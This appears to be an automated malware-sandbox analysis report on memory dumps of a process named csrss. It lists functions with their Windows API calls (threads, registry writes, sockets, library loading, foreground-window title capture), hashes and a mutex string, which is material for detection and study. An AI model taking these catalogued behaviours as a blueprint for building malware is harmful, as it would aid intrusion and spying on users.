Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID:
API String ID: 994465650-0
Opcode ID: 4464c89949f2de8a7354072e265df6e2e0bafda437119ed1c2821b09302df375
Instruction ID: c4788c2c95e56910f1a6e9663d5ee89dbe1e8a8076a56306d3c878961cabdbcd
Opcode Fuzzy Hash: 4464c89949f2de8a7354072e265df6e2e0bafda437119ed1c2821b09302df375
Instruction Fuzzy Hash: 9F411A65E00301BFEB107B7DC95742DBB76BB41144B80015CE45247E52EF2298A98BF3

Function 33D44CC3 Relevance: 6.1, APIs: 4, Instructions: 121
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,33DB4F50), ref: 33D44DB3
CreateThread.KERNEL32(00000000,00000000,?,33DB4EF8,00000000,00000000), ref: 33D44DC7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D44DD2
CloseHandle.KERNEL32(00000000), ref: 33D44DDB

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: dbeedef07ffbdcc699191b7277ba0dcd9189b238971707ca2bd8decd26f1c7a9
Instruction ID: b09f34907dbaef248ae0736515005903e3399382a0a83c7b3784f73fdaf026c0
Opcode Fuzzy Hash: dbeedef07ffbdcc699191b7277ba0dcd9189b238971707ca2bd8decd26f1c7a9
Instruction Fuzzy Hash: 6C41B272A48340AFDB04EB61CC54DBFB7EDAF94710F44091DF48292991DF209949C772

Function 33D4A675 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 33D4A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,33D4A74D), ref: 33D4A6BA
Sleep.KERNEL32(00002710,?,?,?,33D4A74D), ref: 33D4A6E7
CloseHandle.KERNEL32(00000000), ref: 33D4A6EE

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID:
API String ID: 1958988193-0
Opcode ID: 197011858d3983fab2d69f59cecb7de83172de7118ce0b002b7064075dfe8abe
Instruction ID: 2a9000392a5d26747d37e9725b989de1b963684d2582b57b52e43c433c07e1dc
Opcode Fuzzy Hash: 197011858d3983fab2d69f59cecb7de83172de7118ce0b002b7064075dfe8abe
Instruction Fuzzy Hash: EC114C76644B40EEF622BB24C896A1E3BEFBB45691F840408F2835B581CE616C99C765

Function 33D88566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,33D6F9A6,00000000,00000000,?,33D8850D,33D6F9A6,00000000,00000000,00000000,?,33D88839,00000006,FlsSetValue), ref: 33D88598
GetLastError.KERNEL32(?,33D8850D,33D6F9A6,00000000,00000000,00000000,?,33D88839,00000006,FlsSetValue,33D9F160,33D9F168,00000000,00000364,?,33D882E7), ref: 33D885A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,33D8850D,33D6F9A6,00000000,00000000,00000000,?,33D88839,00000006,FlsSetValue,33D9F160,33D9F168,00000000), ref: 33D885B2

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 59fb358fa9b7c8b195c178a102f6bac6229dd264a2ebbfe975350c1cb087d2c1
Instruction ID: 2dd2b97dfcf36450b1254a7692313ec94ba8d126bcf133f95e3e661811d6476c
Opcode Fuzzy Hash: 59fb358fa9b7c8b195c178a102f6bac6229dd264a2ebbfe975350c1cb087d2c1
Instruction Fuzzy Hash: 2901D437607322ABD7115A68CC44A477B98AB04FA2B550660FD46EF240DB30EA01CAE0

Function 33D54EE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,33DB2ADC,H#z,00000000,33D55188,00000000,00000001), ref: 33D54F0B
WSASetLastError.WS2_32(00000000), ref: 33D54F10

Part of subcall function 33D54D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 33D54DD5
Part of subcall function 33D54D86: LoadLibraryA.KERNEL32(?), ref: 33D54E17
Part of subcall function 33D54D86: LoadLibraryA.KERNEL32(?), ref: 33D54E76
Part of subcall function 33D54D86: GetProcAddress.KERNEL32(00000000,?), ref: 33D54E9E

Strings

H#z, xrefs: 33D54EF1

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: LibraryLoad$AddressDirectoryErrorLastProcSystemgetaddrinfo
String ID: H#z
API String ID: 261940356-2410801705
Opcode ID: a00f91cb46c4461eba0e4469bf93ef67463d79d9620786c12c1c320e24cb2762
Instruction ID: 0ce0e3b7de8c5a3d7f4784b011894773580010c69cab09bebd111dc09f0f83ef
Opcode Fuzzy Hash: a00f91cb46c4461eba0e4469bf93ef67463d79d9620786c12c1c320e24cb2762
Instruction Fuzzy Hash: 15D01233601121AFA751B66E8C00ABA96FCDB96B617050026F905E3500E6508C4286A5

Function 33D4D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,33D4EC08,0000000D,00000033,00000000,00000032,00000000,33DA739C,00000000,0000000E,00000000,33DA60BC,00000003), ref: 33D4D078
GetLastError.KERNEL32 ref: 33D4D083

Strings

Rmc-9VASLD, xrefs: 33D4D069

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID: Rmc-9VASLD
API String ID: 1925916568-4148224459
Opcode ID: 253e725d9ab45a91053f8fcc8b5216254d05d5c7419a2c3ac1cfddaadf8920f7
Instruction ID: f0a30075074afde7fd8406eef9f1e54793f135b5a3ceef798dd4646f45f030f3
Opcode Fuzzy Hash: 253e725d9ab45a91053f8fcc8b5216254d05d5c7419a2c3ac1cfddaadf8920f7
Instruction Fuzzy Hash: 18D012B3A543009FEB482B70C45975839E59744701F800419F007E9AC0DA7445918621

Function 33D4A179 Relevance: 4.6, APIs: 3, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,33D4A27D,?,00000000,00000000), ref: 33D4A1FE
CreateThread.KERNEL32(00000000,00000000,33D4A267,?,00000000,00000000), ref: 33D4A20E
CreateThread.KERNEL32(00000000,00000000,Function_00009289,?,00000000,00000000), ref: 33D4A21A

Part of subcall function 33D4B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 33D4B172
Part of subcall function 33D4B164: wsprintfW.USER32 ref: 33D4B1F3

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID:
API String ID: 465354869-0
Opcode ID: 41e4b092867aaef8e3da4ac3dfb52d9cb9199268245111aefb520d48570c65e3
Instruction ID: c3d8f4bc46cde15e61c1503fbf48cc544dee604bfecdf6b10412679df49703d3
Opcode Fuzzy Hash: 41e4b092867aaef8e3da4ac3dfb52d9cb9199268245111aefb520d48570c65e3
Instruction Fuzzy Hash: 5911E9B65003087EE220BB39DCC6CBF7B9DDF81198B40055DF88602952EE615E18CEF2

Function 33D44F51 Relevance: 4.6, APIs: 3, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,33DB4EE0,33DB5598), ref: 33D44F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,33DB4EE0,33DB5598), ref: 33D44FCD
CreateThread.KERNEL32(00000000,00000000,Function_00004150,?,00000000,00000000), ref: 33D44FE0

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Create$EventLocalThreadTime
String ID:
API String ID: 2532271599-0
Opcode ID: 4d736551170583f07de321b336912ec19be95a9274eedd3566eeff323bca0f87
Instruction ID: 5c5e4f4f2af903c551e50ea60b58bbd6d40e32a250b401849636c6951a3d9aca
Opcode Fuzzy Hash: 4d736551170583f07de321b336912ec19be95a9274eedd3566eeff323bca0f87
Instruction Fuzzy Hash: 9C11E9368003846EE720A7B6C80CEAB7FFC9BC2710F44054EF48257641DEB09186CBB2

Function 33D535A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 33D535CA
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 33D535E7
RegCloseKey.ADVAPI32(?), ref: 33D535F2

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: b9e9ed655af5b4d9ba78d03242fd044fd71ba19e9df5deb02b0c3eb1083cf7ca
Instruction ID: f06b63f22426f4ed4a5039bc44c6eabd641ecaa80aabbcf422dce6dd690c3315
Opcode Fuzzy Hash: b9e9ed655af5b4d9ba78d03242fd044fd71ba19e9df5deb02b0c3eb1083cf7ca
Instruction Fuzzy Hash: CB01D67A901128BBDF209B95CC09DDE7FBDDB84651F000159BA09E3200DB318E15DBB0

Function 33D536F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,33DB52F0), ref: 33D53714
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 33D5372D
RegCloseKey.ADVAPI32(00000000), ref: 33D53738

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 0cd6999cd56fb37a9a503c2de226a7acd2021cc2aaaebafb1c06f38356476516
Instruction ID: 989ea747fdd2bc95df80cf0df22ad96de1ff3c94f467fff6c51c8858a86207c9
Opcode Fuzzy Hash: 0cd6999cd56fb37a9a503c2de226a7acd2021cc2aaaebafb1c06f38356476516
Instruction Fuzzy Hash: F1011D7680022DBBEF115FA1DC45DEA7F79EF05750F004154FE19A2110D7328976DBA0

Function 33D53549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 33D53569
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,33DB52F0), ref: 33D53587
RegCloseKey.ADVAPI32(?), ref: 33D53592

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 54117bde25343cac3cff0db69e1a9440e71f6ec38b9a29cdae865d0d651248a0
Instruction ID: 69e191843646cac7cbe41c5dffcfe46ae4fc437310d556b86f76681b5dbf8e2f
Opcode Fuzzy Hash: 54117bde25343cac3cff0db69e1a9440e71f6ec38b9a29cdae865d0d651248a0
Instruction Fuzzy Hash: 1EF01D76900218BFEF119FE0DC06FEE7BBCEB04711F104195BA09E6140E6315A54AB90

Function 33D534FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,33D4C19C,33DA6C48), ref: 33D53516
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,33D4C19C,33DA6C48), ref: 33D5352A
RegCloseKey.ADVAPI32(?,?,?,33D4C19C,33DA6C48), ref: 33D53535

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 6d6c53b3283924a6da651bfdc1db10a73622453ecc9e39099d94ed227841065a
Instruction ID: 5f3701891985f8bf68007021bfe7178e03451ca9666c01df9cae3288cd0a9419
Opcode Fuzzy Hash: 6d6c53b3283924a6da651bfdc1db10a73622453ecc9e39099d94ed227841065a
Instruction Fuzzy Hash: C7E0E572905238BBEF215FA2DD0DEEB7FACDF46AA0B014154BD0DA5101D6754E20D6E0

Function 33D53877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,33DA60A4), ref: 33D53885
RegSetValueExA.KERNEL32(33DA60A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,33D4C152,33DA6C48,00000001,000000AF,33DA60A4), ref: 33D538A0
RegCloseKey.ADVAPI32(33DA60A4,?,?,?,33D4C152,33DA6C48,00000001,000000AF,33DA60A4), ref: 33D538AB

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: af32c53c8771263c5c41b52c5d4a6ff9985301cc3acceb40992b97d1fb184cd1
Instruction ID: fc390769935e9a287790cf361d7ec8cc10e6cf4bc57ffd1fb4e756856b74fe77
Opcode Fuzzy Hash: af32c53c8771263c5c41b52c5d4a6ff9985301cc3acceb40992b97d1fb184cd1
Instruction Fuzzy Hash: 6DE03976500218BBFF11AFA0CC06FEA7BACEB04A90F014154BF19E6140E7318A2497E0

Function 33D8EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 33D8EDE9

Strings

, xrefs: 33D8EE2E

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 892c9fb093542a5f5148a2d316cafbc6aa09fc557ed200725586530b254db574
Instruction ID: 5e55b0a7425eda78ae6374a47eecf253f5ea71e203d4e9ade754bfed7c5ff5f5
Opcode Fuzzy Hash: 892c9fb093542a5f5148a2d316cafbc6aa09fc557ed200725586530b254db574
Instruction Fuzzy Hash: 1D412B7450434C9BDB228E24CC84AE6BBBDDF45708F1808EDE5CA8B152D235BA45CF21

Function 33D5B2C3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 33D5BFB7: GetCurrentProcess.KERNEL32(?,?,?,33D4DAAA,33DA725C,00000000), ref: 33D5BFC8
Part of subcall function 33D5BFB7: IsWow64Process.KERNEL32(00000000,?,?,33D4DAAA,33DA725C,00000000), ref: 33D5BFCF

Part of subcall function 33D535A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 33D535CA
Part of subcall function 33D535A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 33D535E7
Part of subcall function 33D535A6: RegCloseKey.ADVAPI32(?), ref: 33D535F2

StrToIntA.SHLWAPI(00000000), ref: 33D5B33C

Strings

H#z, xrefs: 33D5B2CA

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: H#z
API String ID: 782494840-2410801705
Opcode ID: f0ee009faeb69731e1924ef6245d234c30adee354be22abc260e260b819487c1
Instruction ID: 3f3c625f32b560775d5ea2b2369ef1bebd0ba50b063fb19e59990cb70902e6d7
Opcode Fuzzy Hash: f0ee009faeb69731e1924ef6245d234c30adee354be22abc260e260b819487c1
Instruction Fuzzy Hash: FE118C62D053409AFB00A778CC56E7F7B59AB60110F840114F552F39C2EF90184A87F2

Function 33D88BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,33D91F19,33D91F19,?,?), ref: 33D88C24

Strings

LCMapStringEx, xrefs: 33D88BCE

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 62169277567c329d7bf948b225c5ae6982dca8c69f46f76760dc0a5797886d7f
Instruction ID: 3c9133a5da6014407ed99161c110c2197ebdf993f68d808bdb29e213d43ef0fc
Opcode Fuzzy Hash: 62169277567c329d7bf948b225c5ae6982dca8c69f46f76760dc0a5797886d7f
Instruction Fuzzy Hash: 9201E53250120DFBCF029FA0CD04DEE7FA6EF08751F054555FE1569120CA729932EB94

Function 33D88710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 33D8874F

Strings

FlsAlloc, xrefs: 33D8872B

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 833b6ed345488f2fd9e5ca1a49a5a82a9bf478fde7f1a1632ce80d8ba4f5acaa
Instruction ID: 3c8ceccfebbf1c9d7e2bb4792d5cbb339f826fd116002709fd27e0addc5c0086
Opcode Fuzzy Hash: 833b6ed345488f2fd9e5ca1a49a5a82a9bf478fde7f1a1632ce80d8ba4f5acaa
Instruction Fuzzy Hash: DBE02B32E01218FBD701AFB4CD04DBDBBE9CF49612B00019AFC067B200DE712D168AE5

Function 33D78D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 33D78DA9

Strings

FlsAlloc, xrefs: 33D78DA2

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 78e4060e1b7f977ed28403dc1196821376ef8083252c96c4ccba2b2b73ef33be
Instruction ID: 273d5203e3e6e102716e46f7d62fbc4609c00b3c83dc51bc0aa3cfc97eddac01
Opcode Fuzzy Hash: 78e4060e1b7f977ed28403dc1196821376ef8083252c96c4ccba2b2b73ef33be
Instruction Fuzzy Hash: DED05B37E42628BB97112BE45C05BE97654CF065F3F4400E2FE187654195A5481149E5

Function 33D5B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 33D5B7CA

Strings

@, xrefs: 33D5B7C0

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 6f09a589f51a960399b16f6d3e0a299fd69cb0d03adb97f968b77e5dbd77da26
Instruction ID: 6b3a900e36dea566ffd45f41c54a468d52082dd7e599cbfbddd70624b0c9a95b
Opcode Fuzzy Hash: 6f09a589f51a960399b16f6d3e0a299fd69cb0d03adb97f968b77e5dbd77da26
Instruction Fuzzy Hash: CED017B6802318DFC720EFA8E805A8DBBFCFB08214F00416AEC49E3700E770A8018B84

Function 33D8F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 33D8ECEC: GetOEMCP.KERNEL32(00000000,?,?,33D8EF75,?), ref: 33D8ED17

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,33D8EFBA,?,00000000), ref: 33D8F18D
GetCPInfo.KERNEL32(00000000,33D8EFBA,?,?,?,33D8EFBA,?,00000000), ref: 33D8F1A0

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4d9f0112b8953cecc56197db471ecd74ea007e224064bbed2e0f28554556d204
Instruction ID: d00836a793380aa485f53ad0dcc2b3614faf1f3cc24d2a7574cf49cb56fece23
Opcode Fuzzy Hash: 4d9f0112b8953cecc56197db471ecd74ea007e224064bbed2e0f28554556d204
Instruction Fuzzy Hash: 2B513679D003469EE710CF75D880BAABBEDEF41700F58426ED082CF551D634B246CBA1

Function 33D55AEA Relevance: 3.2, APIs: 2, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 33D55B0F
GetTickCount.KERNEL32 ref: 33D55B86

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CountEventTick
String ID:
API String ID: 180926312-0
Opcode ID: 48bf15d75c2b3d3e3c4238b3f7c311e944d834ff7d72c92ff2ad45929410caae
Instruction ID: e66bd88aa5feccd8c224ec503316ab8affb0b0f042bc2fcd4f4024ab2a9215fc
Opcode Fuzzy Hash: 48bf15d75c2b3d3e3c4238b3f7c311e944d834ff7d72c92ff2ad45929410caae
Instruction Fuzzy Hash: FD51A532A083405BDB24EB35D890AFF73E5AF95210F90492DF587979D0EF30994AC662

Function 33D884CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,33D88839,00000006,FlsSetValue,33D9F160,33D9F168,00000000,00000364,?,33D882E7,00000000), ref: 33D8852A
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 33D88537

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 6f66eb74f6f953b77cfec11e4209bf4db97cca2d690ffa201cf22dc938874409
Instruction ID: bdaa3923a63bd1ed628e8163871f1db676edfc02fc8c4e994d83c45514a226a9
Opcode Fuzzy Hash: 6f66eb74f6f953b77cfec11e4209bf4db97cca2d690ffa201cf22dc938874409
Instruction Fuzzy Hash: 3D11E97BA02625DFDB12DE2DD84095A73D5EB84A6274642A5FC55FF244EB30FC0287E0

Function 33D4482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00766D78,00000001,00000006), ref: 33D44852
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,33D4530B,?,?,?,00000000,?,33D9928C,?,?,?,33D4522E), ref: 33D4488E

Part of subcall function 33D4489E: WSAStartup.WS2_32(00000202,00000000), ref: 33D448B3

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: 7d13ef18574cc5c85d26e36573459ddda372588b0f98c9e83176a2b0d88cbc19
Instruction ID: 01d3c397c69f3a86aff9e58858935758fa1494b2566b058a3841947526970c8e
Opcode Fuzzy Hash: 7d13ef18574cc5c85d26e36573459ddda372588b0f98c9e83176a2b0d88cbc19
Instruction Fuzzy Hash: 2F017CB2808B80DEE7359F39E445686BFE4AB09314F04495EF0D6A7B91E7B1A482CF50

Function 33D5BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 33D5BAB8
GetWindowTextW.USER32(00000000,?,00000100), ref: 33D5BACB

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: 11b1ddb4a037d1a47dbc345e0a04de41c3af750241571e6678fdabe4f0120695
Instruction ID: 95eaae4806e9f140b50253a2fdddaaecda6cbf8d20fc756842b287ea49c558e5
Opcode Fuzzy Hash: 11b1ddb4a037d1a47dbc345e0a04de41c3af750241571e6678fdabe4f0120695
Instruction Fuzzy Hash: CCE04876E1032867EB20ABA5DC8DFE5776CEB08710F040199B519D71C1EDB06954C7F1

Function 33D7A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 33D78D94: try_get_function.LIBVCRUNTIME ref: 33D78DA9

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 33D7A40A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 33D7A415

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 5aa1ec15e9923afb846d75440f968ab1f9978f656332de0529250a3f652a03e7
Instruction ID: 573b0b8e26de5f1ee884eb161a87abb110965ca1f034a4ef3b3f6a2f039d2fdb
Opcode Fuzzy Hash: 5aa1ec15e9923afb846d75440f968ab1f9978f656332de0529250a3f652a03e7
Instruction Fuzzy Hash: C8D0222BC08310ACAC041FB8EC0D58B13986F025FD3A002EAE77C8ABC2FF1380066432

Function 33D4DA34 Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 33D4DB9A

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 5e2231fa6db38751de4d05bdc9b498049db5c63e65ff29ebde53e2bffef8892b
Instruction ID: 2aa6ef8134b2d923b3a7dbdb988aad21de4547959f77ce1024a998d89afe4bf3
Opcode Fuzzy Hash: 5e2231fa6db38751de4d05bdc9b498049db5c63e65ff29ebde53e2bffef8892b
